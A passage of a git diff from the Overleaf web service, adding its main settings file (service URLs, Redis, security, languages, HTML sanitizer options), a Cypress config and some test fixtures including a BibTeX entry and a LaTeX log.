+ }, + + // websessions: + // cluster: [ + // {host: '127.0.0.1', port: 7000} + // {host: '127.0.0.1', port: 7001} + // {host: '127.0.0.1', port: 7002} + // {host: '127.0.0.1', port: 7003} + // {host: '127.0.0.1', port: 7004} + // {host: '127.0.0.1', port: 7005} + // ] + + // ratelimiter: + // cluster: [ + // {host: '127.0.0.1', port: 7000} + // {host: '127.0.0.1', port: 7001} + // {host: '127.0.0.1', port: 7002} + // {host: '127.0.0.1', port: 7003} + // {host: '127.0.0.1', port: 7004} + // {host: '127.0.0.1', port: 7005} + // ] + + // cooldown: + // cluster: [ + // {host: '127.0.0.1', port: 7000} + // {host: '127.0.0.1', port: 7001} + // {host: '127.0.0.1', port: 7002} + // {host: '127.0.0.1', port: 7003} + // {host: '127.0.0.1', port: 7004} + // {host: '127.0.0.1', port: 7005} + // ] + + api: { + host: process.env.REDIS_HOST || '127.0.0.1', + port: process.env.REDIS_PORT || '6379', + password: process.env.REDIS_PASSWORD || '', + maxRetriesPerRequest: parseInt( + process.env.REDIS_MAX_RETRIES_PER_REQUEST || '20' + ), + }, + }, + + // Service locations + // ----------------- + + // Configure which ports to run each service on. Generally you + // can leave these as they are unless you have some other services + // running which conflict, or want to run the web process on port 80. + internal: { + web: { + port: process.env.WEB_PORT || 3000, + host: process.env.LISTEN_ADDRESS || '127.0.0.1', + }, + }, + + // Tell each service where to find the other services. If everything + // is running locally then this is easy, but they exist as separate config + // options incase you want to run some services on remote hosts. + apis: { + web: { + url: `http://${ + process.env.WEB_API_HOST || process.env.WEB_HOST || '127.0.0.1' + }:${process.env.WEB_API_PORT || process.env.WEB_PORT || 3000}`, + user: httpAuthUser, + pass: httpAuthPass, + }, + documentupdater: { + url: `http://${ + process.env.DOCUPDATER_HOST || + process.env.DOCUMENT_UPDATER_HOST || + '127.0.0.1' + }:3003`, + }, + docstore: { + url: `http://${process.env.DOCSTORE_HOST || '127.0.0.1'}:3016`, + pubUrl: `http://${process.env.DOCSTORE_HOST || '127.0.0.1'}:3016`, + }, + chat: { + internal_url: `http://${process.env.CHAT_HOST || '127.0.0.1'}:3010`, + }, + filestore: { + url: `http://${process.env.FILESTORE_HOST || '127.0.0.1'}:3009`, + }, + clsi: { + url: `http://${process.env.CLSI_HOST || '127.0.0.1'}:3013`, + // url: "http://#{process.env['CLSI_LB_HOST']}:3014" + backendGroupName: undefined, + submissionBackendClass: + process.env.CLSI_SUBMISSION_BACKEND_CLASS || 'n2d', + }, + clsiCache: { + instances: JSON.parse(process.env.CLSI_CACHE_INSTANCES || '[]'), + }, + project_history: { + sendProjectStructureOps: true, + url: `http://${process.env.PROJECT_HISTORY_HOST || '127.0.0.1'}:3054`, + }, + historyBackupDeletion: { + enabled: false, + url: `http://${process.env.HISTORY_BACKUP_DELETION_HOST || '127.0.0.1'}:3101`, + user: process.env.HISTORY_BACKUP_DELETION_USER || 'staging', + pass: process.env.HISTORY_BACKUP_DELETION_PASS, + }, + realTime: { + url: `http://${process.env.REALTIME_HOST || '127.0.0.1'}:3026`, + }, + contacts: { + url: `http://${process.env.CONTACTS_HOST || '127.0.0.1'}:3036`, + }, + notifications: { + url: `http://${process.env.NOTIFICATIONS_HOST || '127.0.0.1'}:3042`, + }, + webpack: { + url: `http://${process.env.WEBPACK_HOST || '127.0.0.1'}:3808`, + }, + wiki: { + url: process.env.WIKI_URL || 'https://learn.sharelatex.com', + maxCacheAge: parseInt(process.env.WIKI_MAX_CACHE_AGE || 5 * minutes, 10), + }, + + haveIBeenPwned: { + enabled: process.env.HAVE_I_BEEN_PWNED_ENABLED === 'true', + url: + process.env.HAVE_I_BEEN_PWNED_URL || 'https://api.pwnedpasswords.com', + timeout: parseInt(process.env.HAVE_I_BEEN_PWNED_TIMEOUT, 10) || 5 * 1000, + }, + v1_history: { + url: + process.env.V1_HISTORY_URL || + `http://${process.env.V1_HISTORY_HOST || '127.0.0.1'}:${ + process.env.V1_HISTORY_PORT || '3100' + }/api`, + urlForGitBridge: process.env.V1_HISTORY_URL_FOR_GIT_BRIDGE, + user: process.env.V1_HISTORY_USER || 'staging', + pass: + process.env.V1_HISTORY_PASS || + process.env.V1_HISTORY_PASSWORD || + 'password', + + buckets: { + globalBlobs: process.env.OVERLEAF_EDITOR_BLOBS_BUCKET, + projectBlobs: process.env.OVERLEAF_EDITOR_PROJECT_BLOBS_BUCKET, + }, + }, + + // For legacy reasons, we need to populate the below objects. + v1: {}, + recurly: {}, + }, + + // Defines which features are allowed in the + // Permissions-Policy HTTP header + httpPermissions: httpPermissionsPolicy, + useHttpPermissionsPolicy: true, + + jwt: { + key: process.env.OT_JWT_AUTH_KEY, + algorithm: process.env.OT_JWT_AUTH_ALG || 'HS256', + }, + + devToolbar: { + enabled: false, + }, + + splitTests: [], + + // Where your instance of Overleaf Community Edition/Server Pro can be found publicly. Used in emails + // that are sent out, generated links, etc. + siteUrl: (siteUrl = process.env.PUBLIC_URL || 'http://127.0.0.1:3000'), + + lockManager: { + lockTestInterval: intFromEnv('LOCK_MANAGER_LOCK_TEST_INTERVAL', 50), + maxTestInterval: intFromEnv('LOCK_MANAGER_MAX_TEST_INTERVAL', 1000), + maxLockWaitTime: intFromEnv('LOCK_MANAGER_MAX_LOCK_WAIT_TIME', 10000), + redisLockExpiry: intFromEnv('LOCK_MANAGER_REDIS_LOCK_EXPIRY', 30), + slowExecutionThreshold: intFromEnv( + 'LOCK_MANAGER_SLOW_EXECUTION_THRESHOLD', + 5000 + ), + }, + + // Optional separate location for websocket connections, if unset defaults to siteUrl. + wsUrl: process.env.WEBSOCKET_URL, + wsUrlV2: process.env.WEBSOCKET_URL_V2, + wsUrlBeta: process.env.WEBSOCKET_URL_BETA, + + wsUrlV2Percentage: parseInt( + process.env.WEBSOCKET_URL_V2_PERCENTAGE || '0', + 10 + ), + wsRetryHandshake: parseInt(process.env.WEBSOCKET_RETRY_HANDSHAKE || '5', 10), + + // cookie domain + // use full domain for cookies to only be accessible from that domain, + // replace subdomain with dot to have them accessible on all subdomains + cookieDomain: process.env.COOKIE_DOMAIN, + cookieName: process.env.COOKIE_NAME || 'overleaf.sid', + cookieRollingSession: true, + + // this is only used if cookies are used for clsi backend + // clsiCookieKey: "clsiserver" + + robotsNoindex: process.env.ROBOTS_NOINDEX === 'true' || false, + + maxEntitiesPerProject: parseInt( + process.env.MAX_ENTITIES_PER_PROJECT || '2000', + 10 + ), + + projectUploadTimeout: parseInt( + process.env.PROJECT_UPLOAD_TIMEOUT || '120000', + 10 + ), + maxUploadSize: 50 * 1024 * 1024, // 50 MB + multerOptions: { + preservePath: process.env.MULTER_PRESERVE_PATH, + }, + + // start failing the health check if active handles exceeds this limit + maxActiveHandles: process.env.MAX_ACTIVE_HANDLES + ? parseInt(process.env.MAX_ACTIVE_HANDLES, 10) + : undefined, + + // Security + // -------- + security: { + sessionSecret: process.env.SESSION_SECRET, + sessionSecretUpcoming: process.env.SESSION_SECRET_UPCOMING, + sessionSecretFallback: process.env.SESSION_SECRET_FALLBACK, + bcryptRounds: parseInt(process.env.BCRYPT_ROUNDS, 10) || 12, + }, // number of rounds used to hash user passwords (raised to power 2) + + adminUrl: process.env.ADMIN_URL, + adminOnlyLogin: process.env.ADMIN_ONLY_LOGIN === 'true', + adminPrivilegeAvailable: process.env.ADMIN_PRIVILEGE_AVAILABLE === 'true', + blockCrossOriginRequests: process.env.BLOCK_CROSS_ORIGIN_REQUESTS === 'true', + allowedOrigins: (process.env.ALLOWED_ORIGINS || siteUrl).split(','), + + httpAuthUsers, + + // Default features + // ---------------- + // + // You can select the features that are enabled by default for new + // new users. + defaultFeatures: (defaultFeatures = { + collaborators: -1, + dropbox: true, + github: true, + gitBridge: true, + versioning: true, + compileTimeout: 180, + compileGroup: 'standard', + references: true, + trackChanges: true, + }), + + // featuresEpoch: 'YYYY-MM-DD', + + features: { + personal: defaultFeatures, + }, + + groupPlanModalOptions: { + plan_codes: [], + currencies: [], + sizes: [], + usages: [], + }, + plans: [ + { + planCode: 'personal', + name: 'Personal', + price_in_cents: 0, + features: defaultFeatures, + }, + ], + + disableChat: process.env.OVERLEAF_DISABLE_CHAT === 'true', + enableSubscriptions: false, + restrictedCountries: [], + enableOnboardingEmails: process.env.ENABLE_ONBOARDING_EMAILS === 'true', + + enabledLinkedFileTypes: (process.env.ENABLED_LINKED_FILE_TYPES || '').split( + ',' + ), + + // i18n + // ------ + // + i18n: { + checkForHTMLInVars: process.env.I18N_CHECK_FOR_HTML_IN_VARS === 'true', + escapeHTMLInVars: process.env.I18N_ESCAPE_HTML_IN_VARS === 'true', + subdomainLang: { + www: { lngCode: 'en', url: siteUrl }, + }, + defaultLng: 'en', + }, + + // Spelling languages + // dic = available in client + // server: false = not available on server + // ------------------ + languages: [ + { code: 'en', name: 'English' }, + { code: 'en_US', dic: 'en_US', name: 'English (American)' }, + { code: 'en_GB', dic: 'en_GB', name: 'English (British)' }, + { code: 'en_CA', dic: 'en_CA', name: 'English (Canadian)' }, + { + code: 'en_AU', + dic: 'en_AU', + name: 'English (Australian)', + server: false, + }, + { + code: 'en_ZA', + dic: 'en_ZA', + name: 'English (South African)', + server: false, + }, + { code: 'af', dic: 'af_ZA', name: 'Afrikaans' }, + { code: 'an', dic: 'an_ES', name: 'Aragonese', server: false }, + { code: 'ar', dic: 'ar', name: 'Arabic' }, + { code: 'be_BY', dic: 'be_BY', name: 'Belarusian', server: false }, + { code: 'eu', dic: 'eu', name: 'Basque' }, + { code: 'bn_BD', dic: 'bn_BD', name: 'Bengali', server: false }, + { code: 'bs_BA', dic: 'bs_BA', name: 'Bosnian', server: false }, + { code: 'br', dic: 'br_FR', name: 'Breton' }, + { code: 'bg', dic: 'bg_BG', name: 'Bulgarian' }, + { code: 'ca', dic: 'ca', name: 'Catalan' }, + { code: 'hr', dic: 'hr_HR', name: 'Croatian' }, + { code: 'cs', dic: 'cs_CZ', name: 'Czech' }, + { code: 'da', dic: 'da_DK', name: 'Danish' }, + { code: 'nl', dic: 'nl', name: 'Dutch' }, + { code: 'dz', dic: 'dz', name: 'Dzongkha', server: false }, + { code: 'eo', dic: 'eo', name: 'Esperanto' }, + { code: 'et', dic: 'et_EE', name: 'Estonian' }, + { code: 'fo', dic: 'fo', name: 'Faroese' }, + { code: 'fr', dic: 'fr', name: 'French' }, + { code: 'gl', dic: 'gl_ES', name: 'Galician' }, + { code: 'de', dic: 'de_DE', name: 'German' }, + { code: 'de_AT', dic: 'de_AT', name: 'German (Austria)', server: false }, + { + code: 'de_CH', + dic: 'de_CH', + name: 'German (Switzerland)', + server: false, + }, + { code: 'el', dic: 'el_GR', name: 'Greek' }, + { code: 'gug_PY', dic: 'gug_PY', name: 'Guarani', server: false }, + { code: 'gu_IN', dic: 'gu_IN', name: 'Gujarati', server: false }, + { code: 'he_IL', dic: 'he_IL', name: 'Hebrew', server: false }, + { code: 'hi_IN', dic: 'hi_IN', name: 'Hindi', server: false }, + { code: 'hu_HU', dic: 'hu_HU', name: 'Hungarian', server: false }, + { code: 'is_IS', dic: 'is_IS', name: 'Icelandic', server: false }, + { code: 'id', dic: 'id_ID', name: 'Indonesian' }, + { code: 'ga', dic: 'ga_IE', name: 'Irish' }, + { code: 'it', dic: 'it_IT', name: 'Italian' }, + { code: 'kk', dic: 'kk_KZ', name: 'Kazakh' }, + { code: 'ko', dic: 'ko', name: 'Korean', server: false }, + { code: 'ku', name: 'Kurdish' }, + { code: 'kmr', dic: 'kmr_Latn', name: 'Kurmanji', server: false }, + { code: 'lv', dic: 'lv_LV', name: 'Latvian' }, + { code: 'lt', dic: 'lt_LT', name: 'Lithuanian' }, + { code: 'lo_LA', dic: 'lo_LA', name: 'Laotian', server: false }, + { code: 'ml_IN', dic: 'ml_IN', name: 'Malayalam', server: false }, + { code: 'mn_MN', dic: 'mn_MN', name: 'Mongolian', server: false }, + { code: 'nr', name: 'Ndebele' }, + { code: 'ne_NP', dic: 'ne_NP', name: 'Nepali', server: false }, + { code: 'ns', name: 'Northern Sotho' }, + { code: 'no', name: 'Norwegian' }, + { code: 'nb_NO', dic: 'nb_NO', name: 'Norwegian (Bokmål)', server: false }, + { code: 'nn_NO', dic: 'nn_NO', name: 'Norwegian (Nynorsk)', server: false }, + { code: 'oc_FR', dic: 'oc_FR', name: 'Occitan', server: false }, + { code: 'fa', dic: 'fa_IR', name: 'Persian' }, + { code: 'pl', dic: 'pl_PL', name: 'Polish' }, + { code: 'pt_BR', dic: 'pt_BR', name: 'Portuguese (Brazilian)' }, + { + code: 'pt_PT', + dic: 'pt_PT', + name: 'Portuguese (European)', + }, + { code: 'pa', name: 'Punjabi' }, + { code: 'ro', dic: 'ro_RO', name: 'Romanian' }, + { code: 'ru', dic: 'ru_RU', name: 'Russian' }, + { code: 'gd_GB', dic: 'gd_GB', name: 'Scottish Gaelic', server: false }, + { code: 'sr_RS', dic: 'sr_RS', name: 'Serbian', server: false }, + { code: 'si_LK', dic: 'si_LK', name: 'Sinhala', server: false }, + { code: 'sk', dic: 'sk_SK', name: 'Slovak' }, + { code: 'sl', dic: 'sl_SI', name: 'Slovenian' }, + { code: 'st', name: 'Southern Sotho' }, + { code: 'es', dic: 'es_ES', name: 'Spanish' }, + { code: 'sw_TZ', dic: 'sw_TZ', name: 'Swahili', server: false }, + { code: 'sv', dic: 'sv_SE', name: 'Swedish' }, + { code: 'tl', dic: 'tl', name: 'Tagalog' }, + { code: 'te_IN', dic: 'te_IN', name: 'Telugu', server: false }, + { code: 'th_TH', dic: 'th_TH', name: 'Thai', server: false }, + { code: 'bo', dic: 'bo', name: 'Tibetan', server: false }, + { code: 'ts', name: 'Tsonga' }, + { code: 'tn', name: 'Tswana' }, + { code: 'tr_TR', dic: 'tr_TR', name: 'Turkish', server: false }, + { code: 'uk_UA', dic: 'uk_UA', name: 'Ukrainian', server: false }, + { code: 'hsb', name: 'Upper Sorbian' }, + { code: 'uz_UZ', dic: 'uz_UZ', name: 'Uzbek', server: false }, + { code: 'vi_VN', dic: 'vi_VN', name: 'Vietnamese', server: false }, + { code: 'cy', name: 'Welsh' }, + { code: 'xh', name: 'Xhosa' }, + ], + + translatedLanguages: { + cn: '简体中文', + cs: 'Čeština', + da: 'Dansk', + de: 'Deutsch', + en: 'English', + es: 'Español', + fi: 'Suomi', + fr: 'Français', + it: 'Italiano', + ja: '日本語', + ko: '한국어', + nl: 'Nederlands', + no: 'Norsk', + pl: 'Polski', + pt: 'Português', + ro: 'Română', + ru: 'Русский', + sv: 'Svenska', + tr: 'Türkçe', + uk: 'Українська', + 'zh-CN': '简体中文', + }, + + maxDictionarySize: 1024 * 1024, // 1 MB + + // Password Settings + // ----------- + // These restrict the passwords users can use when registering + // opts are from http://antelle.github.io/passfield + passwordStrengthOptions: { + length: { + min: 8, + // Bcrypt does not support longer passwords than that. + max: 72, + }, + }, + + elevateAccountSecurityAfterFailedLogin: + parseInt(process.env.ELEVATED_ACCOUNT_SECURITY_AFTER_FAILED_LOGIN_MS, 10) || + 24 * 60 * 60 * 1000, + + deviceHistory: { + cookieName: process.env.DEVICE_HISTORY_COOKIE_NAME || 'deviceHistory', + entryExpiry: + parseInt(process.env.DEVICE_HISTORY_ENTRY_EXPIRY_MS, 10) || + 90 * 24 * 60 * 60 * 1000, + maxEntries: parseInt(process.env.DEVICE_HISTORY_MAX_ENTRIES, 10) || 10, + secret: process.env.DEVICE_HISTORY_SECRET, + }, + + // Email support + // ------------- + // + // Overleaf uses nodemailer (http://www.nodemailer.com/) to send transactional emails. + // To see the range of transport and options they support, see http://www.nodemailer.com/docs/transports + // email: + // fromAddress: "" + // replyTo: "" + // lifecycle: false + // # Example transport and parameter settings for Amazon SES + // transport: "SES" + // parameters: + // AWSAccessKeyID: "" + // AWSSecretKey: "" + + // For legacy reasons, we need to populate this object. + sentry: {}, + + // Production Settings + // ------------------- + debugPugTemplates: process.env.DEBUG_PUG_TEMPLATES === 'true', + precompilePugTemplatesAtBootTime: process.env + .PRECOMPILE_PUG_TEMPLATES_AT_BOOT_TIME + ? process.env.PRECOMPILE_PUG_TEMPLATES_AT_BOOT_TIME === 'true' + : process.env.NODE_ENV === 'production', + + // Should javascript assets be served minified or not. + useMinifiedJs: process.env.MINIFIED_JS === 'true' || false, + + // Should static assets be sent with a header to tell the browser to cache + // them. + cacheStaticAssets: false, + + // If you are running Overleaf over https, set this to true to send the + // cookie with a secure flag (recommended). + secureCookie: false, + + // 'SameSite' cookie setting. Can be set to 'lax', 'none' or 'strict' + // 'lax' is recommended, as 'strict' will prevent people linking to projects + // https://tools.ietf.org/html/draft-ietf-httpbis-rfc6265bis-03#section-4.1.2.7 + sameSiteCookie: 'lax', + + // If you are running Overleaf behind a proxy (like Apache, Nginx, etc) + // then set this to true to allow it to correctly detect the forwarded IP + // address and http/https protocol information. + behindProxy: false, + + // Delay before closing the http server upon receiving a SIGTERM process signal. + gracefulShutdownDelayInMs: + parseInt(process.env.GRACEFUL_SHUTDOWN_DELAY_SECONDS ?? '5', 10) * seconds, + + maxReconnectGracefullyIntervalMs: parseInt( + process.env.MAX_RECONNECT_GRACEFULLY_INTERVAL_MS ?? '30000', + 10 + ), + + // Expose the hostname in the `X-Served-By` response header + exposeHostname: process.env.EXPOSE_HOSTNAME === 'true', + + // Cookie max age (in milliseconds). Set to false for a browser session. + cookieSessionLength: 5 * 24 * 60 * 60 * 1000, // 5 days + + // When true, only allow invites to be sent to email addresses that + // already have user accounts + restrictInvitesToExistingAccounts: false, + + // Should we allow access to any page without logging in? This includes + // public projects, /learn, /templates, about pages, etc. + allowPublicAccess: process.env.OVERLEAF_ALLOW_PUBLIC_ACCESS === 'true', + + // editor should be open by default + editorIsOpen: process.env.EDITOR_OPEN !== 'false', + + // site should be open by default + siteIsOpen: process.env.SITE_OPEN !== 'false', + // status file for closing/opening the site at run-time, polled every 5s + siteMaintenanceFile: process.env.SITE_MAINTENANCE_FILE, + + // Use a single compile directory for all users in a project + // (otherwise each user has their own directory) + // disablePerUserCompiles: true + + // Domain the client (pdfjs) should download the compiled pdf from + pdfDownloadDomain: process.env.COMPILES_USER_CONTENT_DOMAIN, // "http://clsi-lb:3014" + + // By default turn on feature flag, can be overridden per request. + enablePdfCaching: process.env.ENABLE_PDF_CACHING === 'true', + + // Maximum size of text documents in the real-time editing system. + max_doc_length: 2 * 1024 * 1024, // 2mb + + primary_email_check_expiration: 1000 * 60 * 60 * 24 * 90, // 90 days + + // Maximum JSON size in HTTP requests + // We should be able to process twice the max doc length, to allow for + // - the doc content + // - text ranges spanning the whole doc + // + // There's also overhead required for the JSON encoding and the UTF-8 encoding, + // theoretically up to 3 times the max doc length. On the other hand, we don't + // want to block the event loop with JSON parsing, so we try to find a + // practical compromise. + max_json_request_size: + parseInt(process.env.MAX_JSON_REQUEST_SIZE) || 6 * 1024 * 1024, // 6 MB + + // Internal configs + // ---------------- + path: { + // If we ever need to write something to disk (e.g. incoming requests + // that need processing but may be too big for memory, then write + // them to disk here). + dumpFolder: Path.resolve(__dirname, '../data/dumpFolder'), + uploadFolder: Path.resolve(__dirname, '../data/uploads'), + }, + + // Automatic Snapshots + // ------------------- + automaticSnapshots: { + // How long should we wait after the user last edited to + // take a snapshot? + waitTimeAfterLastEdit: 5 * minutes, + // Even if edits are still taking place, this is maximum + // time to wait before taking another snapshot. + maxTimeBetweenSnapshots: 30 * minutes, + }, + + // Smoke test + // ---------- + // Provide log in credentials and a project to be able to run + // some basic smoke tests to check the core functionality. + // + smokeTest: { + user: process.env.SMOKE_TEST_USER, + userId: process.env.SMOKE_TEST_USER_ID, + password: process.env.SMOKE_TEST_PASSWORD, + projectId: process.env.SMOKE_TEST_PROJECT_ID, + rateLimitSubject: process.env.SMOKE_TEST_RATE_LIMIT_SUBJECT || '127.0.0.1', + stepTimeout: parseInt(process.env.SMOKE_TEST_STEP_TIMEOUT || '10000', 10), + }, + + appName: process.env.APP_NAME || 'Overleaf (Community Edition)', + + adminEmail: process.env.ADMIN_EMAIL || 'placeholder@example.com', + adminDomains: process.env.ADMIN_DOMAINS + ? JSON.parse(process.env.ADMIN_DOMAINS) + : undefined, + + nav: { + title: process.env.APP_NAME || 'Overleaf Community Edition', + + hide_powered_by: process.env.NAV_HIDE_POWERED_BY === 'true', + left_footer: [], + + right_footer: [ + { + text: " Fork on GitHub!", + url: 'https://github.com/overleaf/overleaf', + }, + ], + + showSubscriptionLink: false, + + header_extras: [], + }, + // Example: + // header_extras: [{text: "Some Page", url: "http://example.com/some/page", class: "subdued"}] + + recaptcha: { + endpoint: + process.env.RECAPTCHA_ENDPOINT || + 'https://www.google.com/recaptcha/api/siteverify', + trustedUsers: (process.env.CAPTCHA_TRUSTED_USERS || '') + .split(',') + .map(x => x.trim()) + .filter(x => x !== ''), + trustedUsersRegex: process.env.CAPTCHA_TRUSTED_USERS_REGEX + ? // Enforce matching of the entire input. + new RegExp(`^${process.env.CAPTCHA_TRUSTED_USERS_REGEX}$`) + : null, + disabled: { + invite: true, + login: true, + passwordReset: true, + register: true, + addEmail: true, + }, + }, + + customisation: {}, + + redirects: { + '/templates/index': '/templates/', + }, + + reloadModuleViewsOnEachRequest: process.env.NODE_ENV === 'development', + + rateLimit: { + subnetRateLimiterDisabled: + process.env.SUBNET_RATE_LIMITER_DISABLED === 'true', + autoCompile: { + everyone: process.env.RATE_LIMIT_AUTO_COMPILE_EVERYONE || 100, + standard: process.env.RATE_LIMIT_AUTO_COMPILE_STANDARD || 25, + }, + login: { + ip: { points: 20, subnetPoints: 200, duration: 60 }, + email: { points: 10, duration: 120 }, + }, + }, + + analytics: { + enabled: false, + }, + + compileBodySizeLimitMb: process.env.COMPILE_BODY_SIZE_LIMIT_MB || 7, + + textExtensions: defaultTextExtensions.concat( + parseTextExtensions(process.env.ADDITIONAL_TEXT_EXTENSIONS) + ), + + // case-insensitive file names that is editable (doc) in the editor + editableFilenames: ['latexmkrc', '.latexmkrc', 'makefile', 'gnumakefile'], + + fileIgnorePattern: + process.env.FILE_IGNORE_PATTERN || + '**/{{__MACOSX,.git,.texpadtmp,.R}{,/**},.!(latexmkrc),*.{dvi,aux,log,toc,out,pdfsync,synctex,synctex(busy),fdb_latexmk,fls,nlo,ind,glo,gls,glg,bbl,blg,doc,docx,gz,swp}}', + + validRootDocExtensions: ['tex', 'Rtex', 'ltx', 'Rnw'], + + emailConfirmationDisabled: + process.env.EMAIL_CONFIRMATION_DISABLED === 'true' || false, + + emailAddressLimit: intFromEnv('EMAIL_ADDRESS_LIMIT', 10), + + enabledServices: (process.env.ENABLED_SERVICES || 'web,api') + .split(',') + .map(s => s.trim()), + + // module options + // ---------- + modules: { + sanitize: { + options: { + allowedTags: [ + 'h1', + 'h2', + 'h3', + 'h4', + 'h5', + 'h6', + 'blockquote', + 'p', + 'a', + 'ul', + 'ol', + 'nl', + 'li', + 'b', + 'i', + 'strong', + 'em', + 'strike', + 'code', + 'hr', + 'br', + 'div', + 'table', + 'thead', + 'col', + 'caption', + 'tbody', + 'tr', + 'th', + 'td', + 'tfoot', + 'pre', + 'iframe', + 'img', + 'figure', + 'figcaption', + 'span', + 'source', + 'video', + 'del', + ], + allowedAttributes: { + a: [ + 'href', + 'name', + 'target', + 'class', + 'event-tracking', + 'event-tracking-ga', + 'event-tracking-label', + 'event-tracking-trigger', + ], + div: ['class', 'id', 'style'], + h1: ['class', 'id'], + h2: ['class', 'id'], + h3: ['class', 'id'], + h4: ['class', 'id'], + h5: ['class', 'id'], + h6: ['class', 'id'], + p: ['class'], + col: ['width'], + figure: ['class', 'id', 'style'], + figcaption: ['class', 'id', 'style'], + i: ['aria-hidden', 'aria-label', 'class', 'id'], + iframe: [ + 'allowfullscreen', + 'frameborder', + 'height', + 'src', + 'style', + 'width', + ], + img: ['alt', 'class', 'src', 'style'], + source: ['src', 'type'], + span: ['class', 'id', 'style'], + strong: ['style'], + table: ['border', 'class', 'id', 'style'], + td: ['colspan', 'rowspan', 'headers', 'style'], + th: [ + 'abbr', + 'headers', + 'colspan', + 'rowspan', + 'scope', + 'sorted', + 'style', + ], + tr: ['class'], + video: ['alt', 'class', 'controls', 'height', 'width'], + }, + }, + }, + }, + + overleafModuleImports: { + // modules to import (an empty array for each set of modules) + // + // Restart webpack after making changes. + // + createFileModes: [], + devToolbar: [], + gitBridge: [], + publishModal: [], + tprFileViewInfo: [], + tprFileViewRefreshError: [], + tprFileViewRefreshButton: [], + tprFileViewNotOriginalImporter: [], + contactUsModal: [], + editorToolbarButtons: [], + sourceEditorExtensions: [], + sourceEditorComponents: [], + pdfLogEntryComponents: [], + pdfLogEntriesComponents: [], + diagnosticActions: [], + sourceEditorCompletionSources: [], + sourceEditorSymbolPalette: [], + sourceEditorToolbarComponents: [], + mainEditorLayoutModals: [], + langFeedbackLinkingWidgets: [], + labsExperiments: [], + integrationLinkingWidgets: [], + referenceLinkingWidgets: [], + importProjectFromGithubModalWrapper: [], + importProjectFromGithubMenu: [], + editorLeftMenuSync: [], + editorLeftMenuManageTemplate: [], + oauth2Server: [], + managedGroupSubscriptionEnrollmentNotification: [], + managedGroupEnrollmentInvite: [], + ssoCertificateInfo: [], + v1ImportDataScreen: [], + snapshotUtils: [], + usGovBanner: [], + offlineModeToolbarButtons: [], + settingsEntries: [], + autoCompleteExtensions: [], + sectionTitleGenerators: [], + toastGenerators: [], + editorSidebarComponents: [], + fileTreeToolbarComponents: [], + integrationPanelComponents: [], + referenceSearchSetting: [], + }, + + moduleImportSequence: [ + 'history-v1', + 'launchpad', + 'server-ce-scripts', + 'user-activate', + ], + viewIncludes: {}, + + csp: { + enabled: process.env.CSP_ENABLED === 'true', + reportOnly: process.env.CSP_REPORT_ONLY === 'true', + reportPercentage: parseFloat(process.env.CSP_REPORT_PERCENTAGE) || 0, + reportUri: process.env.CSP_REPORT_URI, + exclude: [], + viewDirectives: { + 'app/views/project/ide-react': [`img-src 'self' data: blob:`], + }, + }, + + unsupportedBrowsers: { + ie: '<=11', + safari: '<=14', + firefox: '<=78', + }, + + // ID of the IEEE brand in the rails app + ieeeBrandId: intFromEnv('IEEE_BRAND_ID', 15), + + managedUsers: { + enabled: false, + }, +} + +module.exports.mergeWith = function (overrides) { + return merge(overrides, module.exports) +} diff --git a/services/web/cypress.config.ts b/services/web/cypress.config.ts new file mode 100644 index 0000000..d44d9dc --- /dev/null +++ b/services/web/cypress.config.ts @@ -0,0 +1,28 @@ +import { defineConfig } from 'cypress' +import { webpackConfig } from './cypress/support/webpack.cypress' + +export default defineConfig({ + fixturesFolder: 'cypress/fixtures', + video: process.env.CYPRESS_VIDEO === 'true', + screenshotsFolder: 'cypress/results', + videosFolder: 'cypress/results', + viewportHeight: 800, + viewportWidth: 800, + component: { + devServer: { + framework: 'react', + bundler: 'webpack', + webpackConfig, + }, + setupNodeEvents(on, config) { + // + }, + specPattern: + process.env.CYPRESS_SPEC_PATTERN || + './{test,modules/**/test}/frontend/**/*.spec.{js,jsx,ts,tsx}', + excludeSpecPattern: process.env.CYPRESS_EXCLUDE_SPEC_PATTERN, + }, + retries: { + runMode: 3, + }, +}) diff --git a/services/web/cypress/fixtures/blobs/5199b66d9d1226551be436c66bad9d962cc05537 b/services/web/cypress/fixtures/blobs/5199b66d9d1226551be436c66bad9d962cc05537 new file mode 100644 index 0000000..3b1715e --- /dev/null +++ b/services/web/cypress/fixtures/blobs/5199b66d9d1226551be436c66bad9d962cc05537 @@ -0,0 +1 @@ +Simply use the section and subsection commands, as in this example document! With Overleaf, all the formatting and numbering is handled automatically according to the template you've chosen. If you're using the Visual Editor, you can also create new section and subsections via the buttons in the editor toolbar. diff --git a/services/web/cypress/fixtures/blobs/a0e21c740cf81e868f158e30e88985b5ea1d6c19 b/services/web/cypress/fixtures/blobs/a0e21c740cf81e868f158e30e88985b5ea1d6c19 new file mode 100644 index 0000000..ca81447 --- /dev/null +++ b/services/web/cypress/fixtures/blobs/a0e21c740cf81e868f158e30e88985b5ea1d6c19 @@ -0,0 +1,8 @@ +@article{greenwade93, + author = "George D. Greenwade", + title = "The {C}omprehensive {T}ex {A}rchive {N}etwork ({CTAN})", + year = "1993", + journal = "TUGBoat", + volume = "14", + number = "3", + pages = "342--351"} diff --git a/services/web/cypress/fixtures/build/mock-writefull-api.js b/services/web/cypress/fixtures/build/mock-writefull-api.js new file mode 100644 index 0000000..4ba52ba --- /dev/null +++ b/services/web/cypress/fixtures/build/mock-writefull-api.js @@ -0,0 +1 @@ +module.exports = {} diff --git a/services/web/cypress/fixtures/build/mock-writefull.css b/services/web/cypress/fixtures/build/mock-writefull.css new file mode 100644 index 0000000..e69de29 diff --git a/services/web/cypress/fixtures/build/output-2.pdf b/services/web/cypress/fixtures/build/output-2.pdf new file mode 100644 index 0000000..d9f89df Binary files /dev/null and b/services/web/cypress/fixtures/build/output-2.pdf differ diff --git a/services/web/cypress/fixtures/build/output-corrupt.pdf b/services/web/cypress/fixtures/build/output-corrupt.pdf new file mode 100644 index 0000000..8d92665 Binary files /dev/null and b/services/web/cypress/fixtures/build/output-corrupt.pdf differ diff --git a/services/web/cypress/fixtures/build/output-human-readable.log b/services/web/cypress/fixtures/build/output-human-readable.log new file mode 100644 index 0000000..af776aa --- /dev/null +++ b/services/web/cypress/fixtures/build/output-human-readable.log @@ -0,0 +1,21 @@ +log This is pdfTeX, Version 3.14159265-2.6-1.40.21 (TeX Live 2020) (preloaded format=pdflatex 2020.9.10) 8 FEB 2022 16:27 +entering extended mode + \write18 enabled. + %&-line parsing enabled. +**main.tex +(./main.tex +LaTeX2e <2020-02-02> patch level 5 + +LaTeX Warning: Reference `intorduction' on page 1 undefined on input line 11. + + +LaTeX Warning: Reference `section1' on page 1 undefined on input line 13. + +[1 + 